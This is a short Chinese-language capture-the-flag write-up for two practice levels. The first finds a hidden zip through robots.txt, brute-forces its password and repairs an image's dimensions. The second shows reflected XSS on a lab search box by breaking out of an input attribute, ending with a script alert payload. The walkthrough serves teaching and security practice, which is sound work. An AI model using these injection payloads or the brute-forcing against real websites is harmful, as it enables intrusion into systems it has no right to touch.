level 1#
./robot/index.html
打开网址显示
我最讨厌 spider!!!
spider 爬虫
很多网站中都会设置 robots.txt 文件,用来规范、约束或者是禁止爬虫对于网站中数据的采集等操作。robots.txt 文件用于禁止网络爬虫访问网站指定目录
./robot/robots.txt打开显示
sir,this way!!!
f1a9.zip
tip: winrar Yes!!!
访问./robot/f1a9.zip下载 zip 文件
zip 文件加密了,tip:winrar Yes!!!提示用 WinRAR 打开
打开后看到注释显示密码:??????338
一个 6 位数加上 338 共九位
暴力破解
flag{th1s_1s_crc_crack}
密码:860834338
解压后是一张图片,左上角有网易云 logo,长和宽是:798px X 733px
联想到音乐封面图应该是正方形,用 010 修改为 798x798
level 2#
./xss/index.php打开是关于 xss 的,
相关 ->标签闭合绕过
搜索框输入 aaaaa,Dom 结构如下
<form action="index.php" method="GET">
<input name="keyword" value="aaaaaa">
<input type="submit" name="submit" value="搜索">
</form>
前面是 value="后面是">
输入"><p>test</p>闭合 input 标签插入段落,显示如下
<form action="index.php" method="GET">
<input name="keyword" value="">
<p>test</p>
">
<input type="submit" name="submit" value="搜索">
</form>
p 标签被解析
提示要弹框算成功,输入"><script>alert("q")</script>